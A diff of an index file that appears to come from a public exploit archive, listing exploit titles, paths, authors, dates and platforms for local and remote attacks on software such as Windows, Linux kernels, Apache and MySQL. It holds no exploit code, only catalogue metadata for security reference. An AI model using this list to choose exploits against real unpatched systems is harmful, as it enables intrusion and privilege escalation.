16976,platforms/windows/local/16976.pl,"ABBS Audio Media Player 3.0 - '.lst' Buffer Overflow (SEH)",2011-03-14,h1ch4m,windows,local,0
@ -6935,13 +6936,13 @@ id,file,description,date,author,platform,type,port
18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 - Overwrite (SEH)",2012-05-01,blake,windows,local,0
18823,platforms/windows/local/18823.txt,"Symantec pcAnywhere - Insecure File Permissions Privilege Escalation",2012-05-02,"Edward Torkington",windows,local,0
18826,platforms/windows/local/18826.py,"AnvSoft Any Video Converter 4.3.6 - Stack Overflow",2012-05-03,cikumel,windows,local,0
18861,platforms/windows/local/18861.php,"PHP 5.4.3 (Windows x86 Polish) - Code Execution",2012-05-11,0in,windows,local,0
18861,platforms/win_x86/local/18861.php,"PHP 5.4.3 (Windows x86 Polish) - Code Execution",2012-05-11,0in,win_x86,local,0
18862,platforms/windows/local/18862.php,"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local,0
18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 - Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0
18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0
18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit)",2012-05-21,Metasploit,windows,local,0
18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation",2012-05-22,sickness,windows,local,0
18917,platforms/linux/local/18917.txt,"Apache (Mod_Auth_OpenID) - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0
18917,platforms/linux/local/18917.txt,"Apache Mod_Auth_OpenID - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0
18923,platforms/windows/local/18923.rb,"OpenOffice - OLE Importer DocumentSummaryInformation Stream Handling Overflow (Metasploit)",2012-05-25,Metasploit,windows,local,0
18981,platforms/windows/local/18981.txt,"Sysax 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0
18947,platforms/windows/local/18947.rb,"ispVM System - '.XCF' File Handling Overflow (Metasploit)",2012-05-29,Metasploit,windows,local,0
@ -7689,7 +7690,7 @@ id,file,description,date,author,platform,type,port
22246,platforms/hp-ux/local/22246.c,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (1)",2003-02-12,"Last Stage of Delirium",hp-ux,local,0
22247,platforms/hp-ux/local/22247.sh,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (2)",2003-02-20,watercloud,hp-ux,local,0
22248,platforms/hp-ux/local/22248.sh,"HP-UX 10.x - rs.F3000 Unspecified Unauthorized Access",2003-02-12,"Last Stage of Delirium",hp-ux,local,0
22265,platforms/linux/local/22265.pl,"cPanel 5.0 - Openwebmail Privilege Escalation",2003-02-19,deadbeat,linux,local,0
22265,platforms/linux/local/22265.pl,"cPanel 5.0 - 'Openwebmail' Privilege Escalation",2003-02-19,deadbeat,linux,local,0
22272,platforms/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",multiple,local,0
22332,platforms/unix/local/22332.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0
22331,platforms/unix/local/22331.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1)",1998-04-22,"Niall Smart",unix,local,0
@ -7839,11 +7840,11 @@ id,file,description,date,author,platform,type,port
23364,platforms/linux/local/23364.sh,"WMAPM 3.1 - Privilege Escalation",2003-11-08,"Knud Erik Hojgaard",linux,local,0
23414,platforms/linux/local/23414.txt,"FVWM 2.4/2.5 - fvwm-menu-Directory Command Execution",2003-12-05,auto22238,linux,local,0
23479,platforms/linux/local/23479.sh,"GNU Indent 2.2.9 - Local Heap Overflow",2003-12-26,"Pooh Hacking Squadron",linux,local,0
23481,platforms/linux/local/23481.c,"Apache 2.0.4x (mod_php) - File Descriptor Leakage (1)",2003-12-26,"Steve Grubb",linux,local,0
23482,platforms/linux/local/23482.c,"Apache 2.0.4x (mod_php) - File Descriptor Leakage (2)",2003-12-26,"frauk\x41ser",linux,local,0
23481,platforms/linux/local/23481.c,"Apache 2.0.4x mod_php - File Descriptor Leakage (1)",2003-12-26,"Steve Grubb",linux,local,0
23482,platforms/linux/local/23482.c,"Apache 2.0.4x mod_php - File Descriptor Leakage (2)",2003-12-26,"frauk\x41ser",linux,local,0
23510,platforms/linux/local/23510.c,"XSOK 1.0 2 - LANG Environment Variable Local Buffer Overrun",2003-12-30,N2n-Hacker,linux,local,0
23511,platforms/windows/local/23511.txt,"Surfnet 1.31 - Unauthorized Account Depositing",2004-01-02,Rift_XT,windows,local,0
23581,platforms/linux/local/23581.pl,"Apache 2.0.4x (mod_perl) - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",linux,local,0
23581,platforms/linux/local/23581.pl,"Apache 2.0.4x mod_perl - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",linux,local,0
23609,platforms/unix/local/23609.sh,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (1)",2003-08-08,pask,unix,local,0
23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0
23611,platforms/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",multiple,local,0
@ -7880,7 +7881,7 @@ id,file,description,date,author,platform,type,port
24064,platforms/unix/local/24064.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Unspecified Local Memory Corruption Vulnerabilities (3)",2004-04-25,"Secure Network Operations",unix,local,0
24113,platforms/bsd/local/24113.c,"NetBSD/FreeBSD Port Systrace 1.x - Exit Routine Access Validation Privilege Escalation",2004-05-11,"Stefan Esser",bsd,local,0
24123,platforms/linux/local/24123.sh,"WGet 1.x - Insecure File Creation Race Condition",2004-05-17,"Hugo Vazquez",linux,local,0
24141,platforms/linux/local/24141.txt,"cPanel 5-9 - Privilege Escalation",2004-05-24,"Rob Brown",linux,local,0
24141,platforms/linux/local/24141.txt,"cPanel 5 < 9 - Privilege Escalation",2004-05-24,"Rob Brown",linux,local,0
24171,platforms/windows/local/24171.c,"SmartStuff FoolProof Security Program 3.9.x - Administrative Password Recovery",2004-06-05,"Cyrillium Security",windows,local,0
24173,platforms/php/local/24173.txt,"PHP 4.3.x - Microsoft Windows Shell Escape functions Command Execution",2004-06-07,"Daniel Fabian",php,local,0
24182,platforms/linux/local/24182.c,"CVS 1.11.x - Multiple Vulnerabilities",2004-06-09,"Gyan Chawdhary",linux,local,0
@ -7909,7 +7910,7 @@ id,file,description,date,author,platform,type,port
24609,platforms/osx/local/24609.txt,"MacOSXLabs RsyncX 2.1 - Insecure Temporary File Creation",2004-09-17,"Matt Johnston",osx,local,0
24678,platforms/windows/local/24678.txt,"IBM DB2 - Universal Database Information Disclosure",2004-09-01,"Chris Anley",windows,local,0
24682,platforms/windows/local/24682.c,"Microsoft Windows XP - Weak Default Configuration",2004-10-13,americanidiot,windows,local,0
24694,platforms/linux/local/24694.c,"Apache 1.3.x (mod_include) - Local Buffer Overflow",2004-10-18,xCrZx,linux,local,0
24694,platforms/linux/local/24694.c,"Apache 1.3.x mod_include - Local Buffer Overflow",2004-10-18,xCrZx,linux,local,0
24746,platforms/lin_x86-64/local/24746.c,"Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Privilege Escalation (2)",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0
24750,platforms/linux/local/24750.c,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (2)",2004-11-17,Gangstuck,linux,local,0
@ -7927,7 +7928,7 @@ id,file,description,date,author,platform,type,port
24923,platforms/multiple/local/24923.txt,"Google AD Sync Tool - Exposure of Sensitive Information",2013-04-08,"Sense of Security",multiple,local,0
24929,platforms/linux/local/24929.rb,"HP System Management Homepage - Privilege Escalation (Metasploit)",2013-04-08,Metasploit,linux,local,0
24933,platforms/linux/local/24933.txt,"PonyOS 0.4.99-mlp - Multiple Vulnerabilities",2013-04-08,"John Cartwright",linux,local,0
25039,platforms/aix/local/25039.txt,"IBM AIX 5.x - Diag Privilege Escalation Vulnerabilities",2004-12-20,cees-bart,aix,local,0
25039,platforms/aix/local/25039.txt,"IBM AIX 5.x - 'Diag' Privilege Escalation",2004-12-20,cees-bart,aix,local,0
25040,platforms/php/local/25040.php,"PHP 4.x/5.0 Shared Memory Module - Offset Memory Corruption",2004-12-20,"Stefano Di Paola",php,local,0
25055,platforms/osx/local/25055.c,"Darwin Kernel 7.1 - Mach File Parsing Local Integer Overflow",2005-01-19,nemo@felinemenace.org,osx,local,0
25080,platforms/linux/local/25080.txt,"Newsgrab 0.5.0pre4 - Multiple Local And Remote Vulnerabilities",2005-02-02,"Niels Heinen",linux,local,0
@ -8069,7 +8070,7 @@ id,file,description,date,author,platform,type,port
28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow (SEH)",2013-10-14,metacom,windows,local,0
28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Buffer Overflow (SEH)",2013-10-15,metacom,windows,local,0
28984,platforms/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local,0
40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based + Gentoo) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distros + Gentoo) - 'logrotate' Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0
@ -8542,7 +8543,7 @@ id,file,description,date,author,platform,type,port
39214,platforms/linux/local/39214.c,"Linux Kernel 3.3.5 - '/drivers/media/media-device.c' Local Information Disclosure",2014-05-28,"Salva Peiro",linux,local,0
39217,platforms/linux/local/39217.c,"Amanda 3.3.1 - Privilege Escalation",2016-01-11,"Hacker Fantastic",linux,local,0
39230,platforms/linux/local/39230.c,"Linux Kernel 4.3.3 - 'overlayfs' Privilege Escalation (2)",2016-01-12,halfdog,linux,local,0
39244,platforms/linux/local/39244.txt,"Amanda 3.3.1 - amstar Command Injection Privilege Escalation",2016-01-15,"Hacker Fantastic",linux,local,0
39244,platforms/linux/local/39244.txt,"Amanda 3.3.1 - 'amstar' Command Injection Privilege Escalation",2016-01-15,"Hacker Fantastic",linux,local,0
39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0
39277,platforms/linux/local/39277.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (1)",2016-01-19,"Perception Point Team",linux,local,0
40003,platforms/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (2)",2016-01-19,"Federico Bento",linux,local,0
@ -8555,22 +8556,22 @@ id,file,description,date,author,platform,type,port
40774,platforms/linux/local/40774.sh,"Nagios 4.2.2 - Privilege Escalation",2016-11-18,"Vincent Malguy",linux,local,0
39340,platforms/android/local/39340.cpp,"Google Android - 'sensord' Privilege Escalation",2016-01-27,s0m3b0dy,android,local,0
39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0
39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0
39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0
39432,platforms/win_x86/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,win_x86,local,0
39433,platforms/linux/local/39433.py,"Deepin Linux 15 - 'lastore-daemon' Privilege Escalation",2016-02-10,"King's Way",linux,local,0
39438,platforms/xml/local/39438.txt,"Wieland wieplan 4.1 - Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,xml,local,0
39442,platforms/windows/local/39442.txt,"Microsoft Windows - Kerberos Security Feature Bypass (MS16-014)",2016-02-15,"Nabeel Ahmed",windows,local,0
39443,platforms/windows/local/39443.py,"Delta Industrial Automation DCISoft 1.12.09 - Stack Buffer Overflow",2016-02-15,LiquidWorm,windows,local,0
39446,platforms/win_x86/local/39446.py,"Microsoft Windows - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0
39446,platforms/win_x86/local/39446.py,"Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0
39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow (PoC)",2016-02-22,INSECT.B,windows,local,0
39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0
39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0
39520,platforms/win_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Privilege Escalation",2016-03-02,Cr4sh,win_x86-64,local,0
39523,platforms/windows/local/39523.rb,"AppLocker - Execution Prevention Bypass (Metasploit)",2016-03-03,Metasploit,windows,local,0
39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0
39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0
39531,platforms/windows/local/39531.c,"McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass",2016-03-07,"Maurizio Agazzini",windows,local,0
39535,platforms/linux/local/39535.sh,"Exim 4.84-3 - Privilege Escalation",2016-03-09,"Hacker Fantastic",linux,local,0
39549,platforms/linux/local/39549.txt,"Exim < 4.86.2 - Privilege Escalation",2016-03-10,"Dawid Golunski",linux,local,0
39574,platforms/windows/local/39574.cs,"Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0
39574,platforms/win_x86/local/39574.cs,"Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",win_x86,local,0
39579,platforms/windows/local/39579.py,"Internet Download Manager 6.25 Build 14 - 'Find file' Unicode SEH Exploit",2016-03-21,"Rakan Alotaibi",windows,local,0
39594,platforms/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - '.m3u' Stack Overflow",2016-03-22,"Charley Celice",windows,local,0
39595,platforms/multiple/local/39595.txt,"Apple Mac OSX / iOS - SUID Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0
@ -8672,13 +8673,13 @@ id,file,description,date,author,platform,type,port
40484,platforms/windows/local/40484.txt,"Wacom Consumer Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
40485,platforms/windows/local/40485.txt,"Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0
40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
40489,platforms/linux/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",linux,local,0
40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0
40494,platforms/windows/local/40494.txt,"Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0
40497,platforms/windows/local/40497.txt,"sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation",2016-10-11,Amir.ght,windows,local,0
40564,platforms/windows/local/40564.c,"Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)",2016-10-18,"Tomislav Paskalev",windows,local,0
40564,platforms/win_x86/local/40564.c,"Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)",2016-10-18,"Tomislav Paskalev",win_x86,local,0
40503,platforms/linux/local/40503.rb,"Linux Kernel 3.13.1 - 'Recvmmsg' Privilege Escalation (Metasploit)",2016-10-11,Metasploit,linux,local,0
40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0
40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0
40523,platforms/windows/local/40523.txt,"ATKGFNEXSrv ATKGFNEX 1.0.11.1 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",windows,local,0
40525,platforms/windows/local/40525.txt,"IObit Malware Fighter 4.3.1 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,windows,local,0
40528,platforms/windows/local/40528.txt,"Hotspot Shield 6.0.3 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,windows,local,0
@ -8709,7 +8710,7 @@ id,file,description,date,author,platform,type,port
40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access)",2016-10-19,"Phil Oester",linux,local,0
40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
40627,platforms/windows/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",windows,local,0
40627,platforms/win_x86/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",win_x86,local,0
40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0
40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0
@ -8717,13 +8718,13 @@ id,file,description,date,author,platform,type,port
40655,platforms/windows/local/40655.txt,"NVIDIA Driver - UVMLiteController ioctl Handling Unchecked Input/Output Lengths Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0
40660,platforms/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms Stack Buffer Overflow in PsSetCreateProcessNotifyRoutineEx Callback Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0
40669,platforms/macos/local/40669.txt,"Apple macOS 10.12 - 'task_t' Privilege Escalation",2016-10-31,"Google Security Research",macos,local,0
40678,platforms/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0
40678,platforms/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('mysql' System User) Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0
40686,platforms/multiple/local/40686.txt,"Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass",2016-11-02,"Rithwik Jayasimha",multiple,local,0
40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0
40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('root' System User) Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access)",2016-10-26,"Phil Oester",linux,local,0
40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS root_trace - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
@ -8740,7 +8741,7 @@ id,file,description,date,author,platform,type,port
40861,platforms/windows/local/40861.txt,"Microsoft Windows Media Center 6.1.7600 - 'ehshell.exe' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0
40863,platforms/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
40864,platforms/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Local Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
40871,platforms/linux/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,linux,local,0
40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
40902,platforms/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local,0
@ -8751,7 +8752,7 @@ id,file,description,date,author,platform,type,port
40938,platforms/linux/local/40938.py,"RedStar 3.0 Server - 'BEAM & RSSMON' Command Execution (Shellshock)",2016-12-18,"Hacker Fantastic",linux,local,0
40943,platforms/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",linux,local,0
40950,platforms/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation",2016-12-22,"Hector X. Monsegur",aix,local,0
40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
@ -8769,9 +8770,10 @@ id,file,description,date,author,platform,type,port
41152,platforms/linux/local/41152.txt,"GNU Screen 4.5.0 - Privilege Escalation (PoC)",2017-01-24,"Donald Buczek",linux,local,0
41154,platforms/linux/local/41154.sh,"GNU Screen 4.5.0 - Privilege Escalation",2017-01-25,"Xiphos Research Ltd",linux,local,0
41158,platforms/linux/local/41158.txt,"Man-db 2.6.7.1 - Privilege Escalation (PoC)",2015-12-02,halfdog,linux,local,0
41171,platforms/linux/local/41171.txt,"Systemd 228 - Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",linux,local,0
41171,platforms/linux/local/41171.txt,"Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",linux,local,0
41173,platforms/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalation",2017-01-26,"Federico Bento",linux,local,0
41176,platforms/windows/local/41176.c,"Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow",2017-01-26,"Parvez Anwar",windows,local,0
41196,platforms/linux/local/41196.txt,"Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Privilege Escalation (PoC)",2017-01-27,"Wolfgang Hotwagner",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -8812,7 +8814,7 @@ id,file,description,date,author,platform,type,port
63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - GID Remote Code Execution",2003-07-25,"the itch",linux,remote,1114
64,platforms/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135
66,platforms/windows/remote/66.c,"Microsoft Windows Server 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135
67,platforms/multiple/remote/67.c,"Apache 1.3.x (mod_mylo) - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
69,platforms/windows/remote/69.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (1)",2003-07-29,pHrail,windows,remote,135
70,platforms/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (2)",2003-07-30,anonymous,windows,remote,135
74,platforms/linux/remote/74.c,"WU-FTPD 2.6.2 - Off-by-One Remote Command Execution",2003-08-03,Xpl017Elz,linux,remote,21
@ -8851,7 +8853,7 @@ id,file,description,date,author,platform,type,port
126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Exploit",2003-11-20,xCrZx,linux,remote,80
127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (WebServer)",2003-11-22,nesumin,windows,remote,0
130,platforms/windows/remote/130.c,"Microsoft Windows XP - Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0
132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 (mod_userdir) - Remote Users Disclosure",2003-12-06,m00,linux,remote,80
132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure",2003-12-06,m00,linux,remote,80
133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow / Denial of Service",2003-12-15,"Peter Winter-Smith",windows,remote,80
